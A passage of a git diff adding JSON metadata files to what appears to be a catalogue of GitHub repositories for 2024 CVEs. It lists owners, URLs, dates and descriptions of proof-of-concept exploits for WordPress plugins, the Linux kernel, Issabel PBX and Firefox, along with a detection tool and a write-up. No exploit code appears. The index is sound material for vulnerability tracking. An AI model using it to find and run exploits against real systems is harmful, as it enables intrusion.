"2024-03-29T16:05:31Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 94, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 782584156, + "name": "CVE-2024-0582", + "full_name": "Forsaken0129\/CVE-2024-0582", + "owner": { + "login": "Forsaken0129", + "id": 37268525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37268525?v=4", + "html_url": "https:\/\/github.com\/Forsaken0129", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Forsaken0129\/CVE-2024-0582", + "description": null, + "fork": false, + "created_at": "2024-04-05T15:39:48Z", + "updated_at": "2024-04-05T15:39:48Z", + "pushed_at": "2024-04-05T17:32:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806818257, + "name": "cve-2024-0582", + "full_name": "0ptyx\/cve-2024-0582", + "owner": { + "login": "0ptyx", + "id": 88157475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88157475?v=4", + "html_url": "https:\/\/github.com\/0ptyx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0ptyx\/cve-2024-0582", + "description": null, + "fork": false, + "created_at": "2024-05-28T01:06:48Z", + "updated_at": "2024-05-28T11:15:05Z", + "pushed_at": "2024-05-28T11:15:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866966019, + "name": "CVE-2024-0582", + "full_name": "geniuszly\/CVE-2024-0582", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2024-0582", + "description": "is a PoC exploit targeting a specific vulnerability in the Linux kernel (CVE-2024-0582)", + "fork": false, + "created_at": "2024-10-03T07:56:36Z", + "updated_at": "2024-12-30T14:40:46Z", + "pushed_at": "2024-10-03T07:58:47Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-0582", + "ethical-hacking", + "exploit", + "exploit-development", + "iouring", + "iouring-exploit", + "poc", + "security", + "vuln", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 903915508, + "name": "CVE-2024-0582", + "full_name": "101010zyl\/CVE-2024-0582", + "owner": { + "login": "101010zyl", + "id": 64526492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64526492?v=4", + "html_url": "https:\/\/github.com\/101010zyl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/101010zyl\/CVE-2024-0582", + "description": "A data-only attack based on CVE-2024-0582", + "fork": false, + "created_at": "2024-12-15T21:56:41Z", + "updated_at": "2024-12-15T22:21:17Z", + "pushed_at": "2024-12-15T22:21:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0588.json b/2024/CVE-2024-0588.json new file mode 100644 index 0000000000..0258ba50c7 --- /dev/null +++ b/2024/CVE-2024-0588.json @@ -0,0 +1,33 @@ +[ + { + "id": 855575621, + "name": "CVE-2024-0588", + "full_name": "kodaichodai\/CVE-2024-0588", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0588", + "description": "a PoC for CVE-2024-0588\/WP Plugin - Paid Memberships Pro (<= 2.12.7)", + "fork": false, + "created_at": "2024-09-11T05:14:59Z", + "updated_at": "2024-09-11T05:44:12Z", + "pushed_at": "2024-09-11T05:31:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0590.json b/2024/CVE-2024-0590.json new file mode 100644 index 0000000000..6f386e287b --- /dev/null +++ b/2024/CVE-2024-0590.json @@ -0,0 +1,33 @@ +[ + { + "id": 855576401, + "name": "CVE-2024-0590", + "full_name": "kodaichodai\/CVE-2024-0590", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0590", + "description": "a PoC for CVE-2024-0590\/WP Plugin - Microsoft Clarity (<= 0.9.3)", + "fork": false, + "created_at": "2024-09-11T05:17:20Z", + "updated_at": "2024-09-11T05:44:41Z", + "pushed_at": "2024-09-11T05:34:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0623.json b/2024/CVE-2024-0623.json new file mode 100644 index 0000000000..118075f051 --- /dev/null +++ b/2024/CVE-2024-0623.json @@ -0,0 +1,33 @@ +[ + { + "id": 855576963, + "name": "CVE-2024-0623", + "full_name": "kodaichodai\/CVE-2024-0623", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0623", + "description": "a PoC for CVE-2024-0623\/WP Plugin - VK Block Patterns (<= 1.31.1.1)", + "fork": false, + "created_at": "2024-09-11T05:19:13Z", + "updated_at": "2024-09-11T05:45:15Z", + "pushed_at": "2024-09-11T05:32:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0624.json b/2024/CVE-2024-0624.json new file mode 100644 index 0000000000..95c5e2f843 --- /dev/null +++ b/2024/CVE-2024-0624.json @@ -0,0 +1,33 @@ +[ + { + "id": 855577397, + "name": "CVE-2024-0624", + "full_name": "kodaichodai\/CVE-2024-0624", + "owner": { + "login": "kodaichodai", + "id": 90433014, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90433014?v=4", + "html_url": "https:\/\/github.com\/kodaichodai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kodaichodai\/CVE-2024-0624", + "description": "a PoC for CVE-2024-0624\/WP Plugin - Paid Memberships Pro (<= 2.12.7)", + "fork": false, + "created_at": "2024-09-11T05:20:41Z", + "updated_at": "2024-09-11T05:45:43Z", + "pushed_at": "2024-09-11T05:33:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0679.json b/2024/CVE-2024-0679.json new file mode 100644 index 0000000000..ca712df131 --- /dev/null +++ b/2024/CVE-2024-0679.json @@ -0,0 +1,37 @@ +[ + { + "id": 745696785, + "name": "CVE-2024-0679", + "full_name": "RandomRobbieBF\/CVE-2024-0679", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-0679", + "description": "ColorMag <= 3.1.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-01-19T22:30:51Z", + "updated_at": "2024-07-11T16:39:20Z", + "pushed_at": "2024-01-19T22:36:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0679", + "exploit", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0683.json b/2024/CVE-2024-0683.json new file mode 100644 index 0000000000..6714fff78f --- /dev/null +++ b/2024/CVE-2024-0683.json @@ -0,0 +1,33 @@ +[ + { + "id": 908042260, + "name": "CVE-2024-0683", + "full_name": "3474458191\/CVE-2024-0683", + "owner": { + "login": "3474458191", + "id": 187000025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/187000025?v=4", + "html_url": "https:\/\/github.com\/3474458191", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3474458191\/CVE-2024-0683", + "description": "测试", + "fork": false, + "created_at": "2024-12-25T00:48:18Z", + "updated_at": "2024-12-25T00:48:41Z", + "pushed_at": "2024-12-25T00:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0684.json b/2024/CVE-2024-0684.json new file mode 100644 index 0000000000..7523ed6bcd --- /dev/null +++ b/2024/CVE-2024-0684.json @@ -0,0 +1,37 @@ +[ + { + "id": 731901174, + "name": "writeup_split", + "full_name": "Valentin-Metz\/writeup_split", + "owner": { + "login": "Valentin-Metz", + "id": 31850924, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31850924?v=4", + "html_url": "https:\/\/github.com\/Valentin-Metz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Valentin-Metz\/writeup_split", + "description": "Writeup of a heap overflow vulnerability in the GNU coreutils split program. CVE-2024-0684", + "fork": false, + "created_at": "2023-12-15T06:33:15Z", + "updated_at": "2024-06-16T16:25:09Z", + "pushed_at": "2024-01-20T09:31:20Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "binary-exploitation", + "pwn", + "writeup" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0710.json b/2024/CVE-2024-0710.json new file mode 100644 index 0000000000..7342bf815a --- /dev/null +++ b/2024/CVE-2024-0710.json @@ -0,0 +1,33 @@ +[ + { + "id": 784606066, + "name": "CVE-2024-0710", + "full_name": "karlemilnikka\/CVE-2024-0710", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-0710", + "description": "Unauthenticated Form Submission Unique ID Modification", + "fork": false, + "created_at": "2024-04-10T07:23:11Z", + "updated_at": "2024-07-06T00:13:01Z", + "pushed_at": "2024-04-18T13:42:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0713.json b/2024/CVE-2024-0713.json new file mode 100644 index 0000000000..41e56fb19f --- /dev/null +++ b/2024/CVE-2024-0713.json @@ -0,0 +1,33 @@ +[ + { + "id": 770828784, + "name": "CVE-2024-0713", + "full_name": "kitodd\/CVE-2024-0713", + "owner": { + "login": "kitodd", + "id": 158980530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158980530?v=4", + "html_url": "https:\/\/github.com\/kitodd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kitodd\/CVE-2024-0713", + "description": null, + "fork": false, + "created_at": "2024-03-12T08:32:26Z", + "updated_at": "2024-03-12T08:32:26Z", + "pushed_at": "2024-03-12T08:32:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0741.json b/2024/CVE-2024-0741.json new file mode 100644 index 0000000000..5e95a889e0 --- /dev/null +++ b/2024/CVE-2024-0741.json @@ -0,0 +1,33 @@ +[ + { + "id": 841296829, + "name": "Firefox-ANGLE-CVE-2024-0741", + "full_name": "HyHy100\/Firefox-ANGLE-CVE-2024-0741", + "owner": { + "login": "HyHy100", + "id": 21271840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21271840?v=4", + "html_url": "https:\/\/github.com\/HyHy100", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HyHy100\/Firefox-ANGLE-CVE-2024-0741", + "description": "PoC for an OOB write vulnerability I reported to Mozilla in ANGLE Translator (aka WebGL Shader Compiler).", + "fork": false, + "created_at": "2024-08-12T05:57:34Z", + "updated_at": "2024-09-11T13:40:15Z", + "pushed_at": "2024-08-12T07:26:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0757.json b/2024/CVE-2024-0757.json new file mode 100644 index 0000000000..e697a9873f --- /dev/null +++ b/2024/CVE-2024-0757.json @@ -0,0 +1,40 @@ +[ + { + "id": 816179994, + "name": "CVE-2024-0757-Exploit", + "full_name": "hunThubSpace\/CVE-2024-0757-Exploit", + "owner": { + "login": "hunThubSpace", + "id": 49031710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49031710?v=4", + "html_url": "https:\/\/github.com\/hunThubSpace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunThubSpace\/CVE-2024-0757-Exploit", + "description": "A PoC Exploit for CVE-2024-0757 - Insert or Embed Articulate Content into WordPress Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-06-17T07:46:21Z", + "updated_at": "2024-11-20T16:30:50Z", + "pushed_at": "2024-06-18T14:12:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve", + "ethical-hacking", + "exploit", + "penetration-testing", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0762.json b/2024/CVE-2024-0762.json new file mode 100644 index 0000000000..e39f1f86fb --- /dev/null +++ b/2024/CVE-2024-0762.json @@ -0,0 +1,33 @@ +[ + { + "id": 852572281, + "name": "Detect-CVE-2024-0762", + "full_name": "tadash10\/Detect-CVE-2024-0762", + "owner": { + "login": "tadash10", + "id": 126980610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4", + "html_url": "https:\/\/github.com\/tadash10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadash10\/Detect-CVE-2024-0762", + "description": "Detecting vulnerabilities like CVE-2024-0762, particularly in UEFI firmware, is quite challenging due to the low-level nature ", + "fork": false, + "created_at": "2024-09-05T03:25:58Z", + "updated_at": "2024-09-20T02:36:37Z", + "pushed_at": "2024-09-20T02:36:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0783.json b/2024/CVE-2024-0783.json new file mode 100644 index 0000000000..d8406e38c7 --- /dev/null +++ b/2024/CVE-2024-0783.json @@ -0,0 +1,35 @@ +[ + { + "id": 746234103, + "name": "Online-Admission-System-RCE-PoC", + "full_name": "keru6k\/Online-Admission-System-RCE-PoC", + "owner": { + "login": "keru6k", + "id": 73579653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73579653?v=4", + "html_url": "https:\/\/github.com\/keru6k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/keru6k\/Online-Admission-System-RCE-PoC", + "description": "projectworlds' Online Admission System RCE vulnerability PoC, Categorized as CVE-2024-0783", + "fork": false, + "created_at": "2024-01-21T13:26:09Z", + "updated_at": "2024-01-23T12:52:02Z", + "pushed_at": "2024-01-21T13:29:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0783" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0944.json b/2024/CVE-2024-0944.json new file mode 100644 index 0000000000..970f223970 --- /dev/null +++ b/2024/CVE-2024-0944.json @@ -0,0 +1,33 @@ +[ + { + "id": 855192500, + "name": "cve-2024-0944", + "full_name": "Artemisxxx37\/cve-2024-0944", + "owner": { + "login": "Artemisxxx37", + "id": 126729925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126729925?v=4", + "html_url": "https:\/\/github.com\/Artemisxxx37", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Artemisxxx37\/cve-2024-0944", + "description": null, + "fork": false, + "created_at": "2024-09-10T13:23:25Z", + "updated_at": "2024-10-11T14:48:37Z", + "pushed_at": "2024-10-11T14:48:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-0986.json b/2024/CVE-2024-0986.json new file mode 100644 index 0000000000..0eb6f141e1 --- /dev/null +++ b/2024/CVE-2024-0986.json @@ -0,0 +1,40 @@ +[ + { + "id": 787180944, + "name": "Issabel-PBX-4.0.0-RCE-Authenticated", + "full_name": "gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated", + "owner": { + "login": "gunzf0x", + "id": 31874167, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31874167?v=4", + "html_url": "https:\/\/github.com\/gunzf0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gunzf0x\/Issabel-PBX-4.0.0-RCE-Authenticated", + "description": "Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986", + "fork": false, + "created_at": "2024-04-16T03:24:25Z", + "updated_at": "2024-09-02T10:24:53Z", + "pushed_at": "2024-08-24T07:09:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-0986", + "exploit", + "issabel-pbx", + "payload", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10015.json b/2024/CVE-2024-10015.json new file mode 100644 index 0000000000..e519511f19 --- /dev/null +++ b/2024/CVE-2024-10015.json @@ -0,0 +1,33 @@ +[ + { + "id": 890490572, + "name": "CVE-2024-10015", + "full_name": "windz3r0day\/CVE-2024-10015", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-10015", + "description": "CVE-2024-10015 poc exploit", + "fork": false, + "created_at": "2024-11-18T16:53:43Z", + "updated_at": "2024-11-24T07:51:55Z", + "pushed_at": "2024-11-18T19:56:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10124.json b/2024/CVE-2024-10124.json new file mode 100644 index 0000000000..6948313c01 --- /dev/null +++ b/2024/CVE-2024-10124.json @@ -0,0 +1,64 @@ +[ + { + "id": 902440180, + "name": "CVE-2024-10124", + "full_name": "RandomRobbieBF\/CVE-2024-10124", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10124", + "description": "Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce <= 1.1.1 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation\/Activation", + "fork": false, + "created_at": "2024-12-12T15:13:30Z", + "updated_at": "2024-12-13T10:33:26Z", + "pushed_at": "2024-12-12T15:14:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912532095, + "name": "CVE-2024-10124-Poc", + "full_name": "Nxploited\/CVE-2024-10124-Poc", + "owner": { + "login": "Nxploited", + "id": 188819918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188819918?v=4", + "html_url": "https:\/\/github.com\/Nxploited", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nxploited\/CVE-2024-10124-Poc", + "description": null, + "fork": false, + "created_at": "2025-01-05T20:42:10Z", + "updated_at": "2025-01-05T21:12:38Z", + "pushed_at": "2025-01-05T21:12:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10140.json b/2024/CVE-2024-10140.json new file mode 100644 index 0000000000..b7e81d3c4c --- /dev/null +++ b/2024/CVE-2024-10140.json @@ -0,0 +1,33 @@ +[ + { + "id": 875667904, + "name": "CVE-2024-10140", + "full_name": "holypryx\/CVE-2024-10140", + "owner": { + "login": "holypryx", + "id": 182792867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/182792867?v=4", + "html_url": "https:\/\/github.com\/holypryx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/holypryx\/CVE-2024-10140", + "description": null, + "fork": false, + "created_at": "2024-10-20T15:29:14Z", + "updated_at": "2024-10-22T10:02:17Z", + "pushed_at": "2024-10-20T15:31:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10220.json b/2024/CVE-2024-10220.json new file mode 100644 index 0000000000..bf1a7a79cf --- /dev/null +++ b/2024/CVE-2024-10220.json @@ -0,0 +1,157 @@ +[ + { + "id": 891905563, + "name": "CVE-2024-10220-githooks", + "full_name": "mochizuki875\/CVE-2024-10220-githooks", + "owner": { + "login": "mochizuki875", + "id": 37737691, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37737691?v=4", + "html_url": "https:\/\/github.com\/mochizuki875", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mochizuki875\/CVE-2024-10220-githooks", + "description": "CVE-2024-10220 Test repo", + "fork": false, + "created_at": "2024-11-21T06:59:21Z", + "updated_at": "2024-11-21T08:25:57Z", + "pushed_at": "2024-11-21T07:28:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895963991, + "name": "cve-2024-10220", + "full_name": "any2sec\/cve-2024-10220", + "owner": { + "login": "any2sec", + "id": 43882657, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43882657?v=4", + "html_url": "https:\/\/github.com\/any2sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/any2sec\/cve-2024-10220", + "description": null, + "fork": false, + "created_at": "2024-11-29T09:20:30Z", + "updated_at": "2024-11-29T11:24:03Z", + "pushed_at": "2024-11-29T11:24:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896713036, + "name": "cve-2024-10220-githooks", + "full_name": "XiaomingX\/cve-2024-10220-githooks", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-10220-githooks", + "description": "CVE-2024-10220 Test repo", + "fork": false, + "created_at": "2024-12-01T05:15:25Z", + "updated_at": "2024-12-08T18:31:58Z", + "pushed_at": "2024-12-01T05:18:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 903715059, + "name": "CVE-2024-10220", + "full_name": "filipzag\/CVE-2024-10220", + "owner": { + "login": "filipzag", + "id": 35038922, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35038922?v=4", + "html_url": "https:\/\/github.com\/filipzag", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/filipzag\/CVE-2024-10220", + "description": null, + "fork": false, + "created_at": "2024-12-15T11:25:42Z", + "updated_at": "2024-12-15T11:34:25Z", + "pushed_at": "2024-12-15T11:34:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904610222, + "name": "poc-CVE-2024-10220", + "full_name": "candranapits\/poc-CVE-2024-10220", + "owner": { + "login": "candranapits", + "id": 6848647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6848647?v=4", + "html_url": "https:\/\/github.com\/candranapits", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/candranapits\/poc-CVE-2024-10220", + "description": "CVE-2024-10220 POC", + "fork": false, + "created_at": "2024-12-17T08:17:58Z", + "updated_at": "2024-12-17T08:22:35Z", + "pushed_at": "2024-12-17T08:19:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10245.json b/2024/CVE-2024-10245.json new file mode 100644 index 0000000000..ff2cfd2e8d --- /dev/null +++ b/2024/CVE-2024-10245.json @@ -0,0 +1,33 @@ +[ + { + "id": 889946220, + "name": "CVE-2024-10245", + "full_name": "RandomRobbieBF\/CVE-2024-10245", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": 